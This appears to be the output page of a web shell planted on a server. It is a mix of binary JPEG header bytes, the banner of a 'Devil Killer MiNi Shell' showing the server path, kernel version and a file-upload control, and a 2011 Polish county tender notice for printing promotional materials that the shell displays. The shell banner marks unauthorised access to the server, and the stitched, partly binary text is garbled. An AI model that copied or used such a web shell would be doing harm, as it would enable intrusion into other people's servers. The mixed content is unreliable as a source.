JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111013/333814-N-2011.html

<p class="kh_header"><b>Lębork: Wykonanie projektów graficznych, druk oraz dostawa materiałów promocyjnych w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych)</b><br>
<b>Numer ogłoszenia: 333814 - 2011; data zamieszczenia: 13.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów graficznych, druk oraz dostawa materiałów promocyjnych w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie projektów graficznych, druk oraz dostawę materiałów promocyjnych w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych)
Na materiały promocyjne, o których mowa powyżej składają się:
Zadanie 1 - plakaty - 500 szt.
Zadanie 2 - ulotki rekrutacyjne - 21.000 szt.
Zadanie 3 - długopisy - 1000szt
Zadanie 4 -kalendarze listkowe na 2012r. - 2000 szt.
Zadanie 5 -torby płócienne - 250 szt.
Zadanie 6 -notatniki - 300 szt.
Zadanie 7 -roll-up - 1 szt.

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 6 do SIWZ.

Szczegółowy opis przedmiotu zamówienia 
I Część ogólna

1. Przedmiot zamówienia
Przedmiot zamówienia obejmuje wykonanie projektów graficznych, druk oraz dostawę materiałów promocyjnych w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych)
Na materiały promocyjne, o których mowa powyżej składają się:
Zadanie 1 - plakaty - 500 szt.
Zadanie 2 - ulotki rekrutacyjne - 21.000 szt.
Zadanie 3 - długopisy - 1000szt
Zadanie 4 -kalendarze listkowe na 2012r. - 2000 szt.
Zadanie 5 -torby płócienne - 250 szt.
Zadanie 6 -notatniki - 300 szt.
Zadanie 7 -roll-up - 1 szt.

2. Cel realizacji przedmiotu zamówienia

Powiat Lęborski w ramach projektu Kształcenie ustawiczne przepustką do lepszego jutra przewidział zakup materiałów promocyjnych, które są niezbędne do realizacji projektu i związane z przewidzianymi działaniami promocyjnymi i informacyjnymi. Gadżety pozwolą spotęgować świadomość korzystania z pomocy Unii Europejskiej. Projektując ww. materiały należy zastosować obrazy do przełamywania stereotypów płciowych oraz promowania równości poprzez użycie wizerunku kobiety i mężczyzny na części materiałów promocyjnych, które na to pozwalają. Materiały wymienione m.in. w zad. 1, 2, 4, 5, 7 muszą mieć wspólną, spójną wizualizację ze wspólnym logo projektu opracowanym przez grafika.

3. Zakres zamówienia obejmuje:
- przygotowanie wizualizacji i po akceptacji ze strony Zamawiającego wykonanie materiałów promocyjnych zgodnie z wymaganiami techniczno-ilościowymi zawartymi w części II niniejszego opisu
- dostawę materiałów promocyjnych do siedziby Zamawiającego; dostarczone materiały muszą być zapakowane w kartonach

4. Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego)
- Wszystkie materiały muszą posiadać niezbędne oznaczenie zgodne z wymaganiami określonymi 
w obowiązujących Wytycznych dotyczących oznaczenia projektów w ramach PO KL, rozporządzeniem Komisji (WE) nr 1828 2006 z dnia 8.12.2006 r. oraz Księgą identyfikacji wizualnej NSS.
- W dniu zawarcia umowy Zamawiający przekaże Wykonawcy tekst do zamieszczenia w materiałach promocyjnych w programie Word na płycie CD
- Wykonawca opracuje projekty graficzne do wszystkich materiałów promocyjnych przewidzianych do zakupu w ramach przetargu 
- Wykonawca zobowiązany jest przesłać Zamawiającemu drogą poczty elektronicznej w formacie PDF do akceptacji wizualizację graficzną - wzory gotowych, odpowiednio ologowanych i opracowanych materiałów promocyjnych w terminie 4 dni roboczych od dnia podpisania umowy
-Wykonawca ma obowiązek uwzględnić i wprowadzić wszystkie uwagi Zamawiającego do materiałów, jak również wizualizacji graficznych. Zamawiający z tytułu wprowadzanych zmian, niezależnie od ich ilości, nie będzie ponosił żadnych dodatkowych kosztów.
- Wykonawca dokona wskazanych przez Zamawiającego zmian lub poprawek do przedstawionych wizualizacji graficznych w terminie 2 dni roboczych od dnia przedstawienia ww. wizualizacji i ponownie przedstawi je do zatwierdzenia. W przypadku nadal występujących uchybień Zamawiający wezwie Wykonawcę do ich natychmiastowego usunięcia.
- Wykonawca wydrukuje materiały promocyjne wg specyfiki i ilości określonej w części II - Wykaz materiałów oraz wymagania dotyczące ich wykonania
- Wykonawca w terminie wskazanym w pkt 7 SIWZ wykona materiały promocyjne i dostarczy je do Starostwa Powiatowego w Lęborku, do pok. 216, II piętro bez ponoszenia przez Zamawiającego dodatkowych kosztów z tego tytułu.
- Po dostarczeniu przez Wykonawcę materiałów promocyjnych określonych w SIWZ przedstawiciele Zamawiającego i Wykonawcy podpiszą protokół zdawczo-odbiorczy
- Wszystkie artykuły muszą być fabrycznie nowe, pełnowartościowe, w pierwszym gatunku, wolne od wad
- Wszystkie artykuły muszą spełniać łącznie następujące kryteria: funkcjonalność, trwałość, estetyka i bezpieczeństwo: 
- nie występują zarysowania, przebarwienia, pęknięcia, ewentualnie inne uszkodzenia artykułu widoczne gołym okiem (odpowiednio do rodzaju artykułu), 
- poszczególne części artykułu są dobrze do siebie dopasowane, zamocowane oraz zszyte lub sklejone, 
- graficzne elementy artykułu nie są starte, rozmazane, popękane ani nie zmieniły kolorów podczas pocierania ręką lub drapania paznokciem, nie kalkują, 
- krawędzie artykułów są wykończone i nie niosą niebezpieczeństwa skaleczeń
- dany artykuł pod względem wyglądu nie odbiega od dostępnych na rynku standardów oraz wszystkie jego elementy są względem siebie proporcjonalne
- sposób wykonania i użyte materiały nie wywołują wątpliwości co do jakości produktu
- logotypy zamieszczone na materiałach są widoczne i odpowiednio wyeksponowane

II Część szczegółowa - Wykaz materiałów oraz wymagania dotyczące ich wykonania

Zadanie 1 - plakaty 500 szt.
Specyfika określona dla każdej sztuki:
Format: B2 
Surowiec: papier kreda błysk min. 135 g m2, druk offsetowy
- 200 szt. plakatów oprawionych w listwy metalowe po krótszym boku
- 300 szt. bez oprawy
Nadruk: full kolor CMYK, jednostronnie, metodą trwałą, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych

Zadanie 2 - ulotki rekrutacyjne 21.000 szt.	
Specyfika określona dla każdej sztuki:
Format: A3, z falcowaniem na 3 C do środka
Surowiec: papier kreda błysk, min. 170 g m2, druk offsetowy
Nadruk: full kolor CMYK (4+4), obustronnie, metodą trwałą, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych	

Zadanie 3 - długopisy 1000szt
Specyfika określona dla każdej sztuki:
Tworzywo: aluminium
Kolor długopisu: srebrny, możliwe wstawki w innym kolorze
Kolor wkładu: niebieski, odblokowanie wkładu poprzez wciśnięcie
Typ znakowania: grawerowanie
Grawerowanie: jeden kolor, metodą trwałą, z obu stron, z obowiązkowymi logotypami i oznaczeniami określonymi w  Wytycznych dotyczących oznaczenia projektów w ramach PO KL  dla tego rodzaju materiałów, na korpusie (logo PO KL i Unii Europejskiej z odwołaniem do Unii Europejskiej) oraz jeden kolor na klipsie lub przeciwnej stronie długopisu z logo Powiatu Lęborskiego oraz nazwą projektu - z zachowaniem ich określonych obszarów ochronnych

Zadanie 4-kalendarze listkowe na 2012r 2000 szt.
Specyfika określona dla każdej sztuki:
Wymiary: rozmiary orientacyjne 85x54 55 mm
Surowiec: papier kredowy min. 350 g m2, druk offsetowy, dwustronnie powlekane folią błyszczącą,, zaokrąglone narożniki
Nadruk: full kolor CMYK, metodą trwałą, pełen kolor dwustronnie, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych 	

Zadanie 5 -torby płócienne 250 szt.	
Specyfika określona dla każdej sztuki:
Surowiec: surówka bawełniana minimum 120 gr
Kolor: naturalny ecru
Wymiary: rozmiar orientacyjny 38x41 - 42 cm,  z krótkim uchwytem - orientacyjne wymiary ucha: 30 cm - 40 cm
Nadruk: jeden kolor, metodą trwałą, jednostronnie, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych
	
Zadanie 6 - notatniki  300 szt.	
Specyfika określona dla każdej sztuki:
Surowiec: papier
Środek: min. offset 80 g m2
Podkładka: karton biały, min. 250g m2
Kolor: biały 
Objętość: min. 50 stron
Wymiary: bloczek w kratkę w formacie A5, klejony po górnej krawędzi
Nadruk: full kolor CMYK, metodą trwałą, jednostronnie, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych	

Zadanie 7 - roll-up  1 szt.	
Format: dwustronny, rozmiar orientacyjny: 85x200 cm z zadrukiem pełen kolor dwustronnie z tymi samymi informacjami
Opis:
- konstrukcja aluminiowa
-możliwość wielokrotnego składania i rozkładania
-w komplecie z: walizką torbą do transportu i oświetleniem halogenowym wraz z żarówką
Nadruk: full kolor CMYK, dwustronnie, metodą trwałą, na materiale nieprzepuszczającym światła, z obowiązkowymi logotypami i oznaczeniami określonymi w Wytycznych dotyczących oznaczenia projektów w ramach PO KL dla tego rodzaju materiałów (m.in. Logo PO KL, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło PO KL, informacja o współfinansowaniu, logo Powiatu Lęborskiego) z zachowaniem ich określonych obszarów ochronnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 79.82.25.00-7, 79.82.30.00-9, 79.00.00.00-2, 79.82.00.00-8, 79.82.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał lub wykonuje co najmniej 3 usługi/dostawy o łącznej wartości co najmniej 20.000 zł brutto, których przedmiotem zamówienia była realizacja zadań zbliżonych do przedmiotu zamówienia.
Na potwierdzenie tego Warunku wykonawcy zobowiązani są załączyć do oferty Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w  liczbie co najmniej 3 o łącznej wartości co najmniej 20.000 zł brutto, wg załącznika nr 4 do SIWZ z załączeniem dokumentów potwierdzających należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował osobą posiadającą co najmniej 2 letnie doświadczenie w przygotowaniu projektów graficznych, która zrealizowała co najmniej 3 projekty graficzne dla materiałów promocyjnych zbliżonych do przedmiotu zamówienia.
Na potwierdzenie tego warunku Wykonawcy zobowiązani są załączyć do oferty Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia w liczbie co najmniej 1 - posiadającej co najmniej 2 letnie doświadczenie w przygotowaniu projektów graficznych, która zrealizowała co najmniej 3 projekty graficzne dla materiałów promocyjnych zbliżonych do przedmiotu zamówienia., wg załącznika nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W celu potwierdzenia spełniania opisanych przez Zamawiającego warunków udziału w postępowaniu, Wykonawcy ubiegający się o udzielenie niniejszego zamówienia obowiązani są przedłożyć:
a)	wypełniony i podpisany formularz ofertowy stanowiący (załącznik nr 1 do SIWZ)
b)	oświadczenie w trybie art. 22 ust. 1 i art. 24 ust. 1 ustawy na formularzach stanowiących załączniki do niniejszej specyfikacji (załączniki nr 2 i 3 do SIWZ)
c)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie; (załącznik nr 4 do SIWZ)
d)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; (załącznik nr 5 do SIWZ)
2)	W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.
3)	W przypadku wnoszenia oferty wspólnej przez dwa podmioty lub więcej podmiotów gospodarczych każdy z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust.1 Pzp. - każdy z podmiotów występujących wspólnie musi złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. 
4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
5)	Zamawiający wymaga wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom (jeżeli Wykonawca przewiduje taki udział).


Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający określa warunki umowy na realizację zamówienia w niniejszym postępowaniu w Projekcie Umowy, który stanowi zał. nr  7 do SIWZ. Postanowienia oraz zobowiązania przyjęte przez Wykonawcę poprzez złożenie oferty odpowiadającej SIWZ, a także wybór tak skonstruowanej oferty przez Zamawiającego stanowią integralną część umowy na realizację przedmiotu zamówienia.
2.	Nie dopuszcza się jakichkolwiek zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem postanowień pkt. 3 niniejszego rozdziału.
3.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
- zmiany w nazwie, oznaczeniu, siedzibie, numerze konta bankowego Zamawiającego lub Wykonawcy dokonanej w trakcie trwania umowy
- przesunięcia terminu realizacji zamówienia, w szczególności:
- w przypadku wystąpienia przeszkód spowodowanych siłą wyższą, 
- opóźnień w realizacji zamówienia, powstałych z przyczyn zależnych wyłącznie od Zamawiającego, np. związanych z przedłużającym się, niezależnym od Wykonawcy okresem akceptacji przesłanych z potwierdzeniem odbioru wzorów materiałów promocyjnych;
-zmiany osób wskazanych w wykazie, które będą uczestniczyć w wykonywaniu zamówienia.
